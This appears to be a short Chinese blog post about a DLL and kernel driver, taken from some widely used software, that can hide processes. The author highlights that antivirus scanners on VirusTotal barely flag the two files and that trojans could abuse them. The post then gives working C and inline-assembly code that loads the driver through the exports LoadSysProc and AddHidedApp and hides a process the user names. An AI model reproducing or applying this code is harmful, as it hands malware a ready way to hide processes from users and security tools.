一不小心从某软件里看到一个强大的dll与强大的sys,直接上图看dll的导出函数:
看到了吗,可以直接调一下就隐藏进程。
由于这个软件的使用范围还非常的广,所有这两个文件基本已被杀软白名单放过,上传到virustotal上看看:
sys文件: 结果: 1/41 (2.44%)
dll文件: 结果: 0/41 (0.00%)
如果这两个模块由木马携带,被木马利用。。。。。
调用方法:int _tmain(int argc, _TCHAR* argv[])
{
BOOL retval;
char ProcessName[100];
HMODULE hModule=LoadLibrary(_T("sysproc.dll"));
DWORD Addr=(DWORD)GetProcAddress(hModule,"LoadSysProc");
__asm
{
mov eax,Addr;
call eax;
mov retval,eax;
}
printf("加载驱动:%d \n输入要隐藏的进程名:",retval);
scanf("%s",ProcessName);
Addr=(DWORD)GetProcAddress(hModule,"AddHidedApp");
__asm
{
lea eax,ProcessName;
push eax;
mov eax,Addr;
call eax;
mov retval,eax;
}
printf("%d \n",retval);
return 0;
}
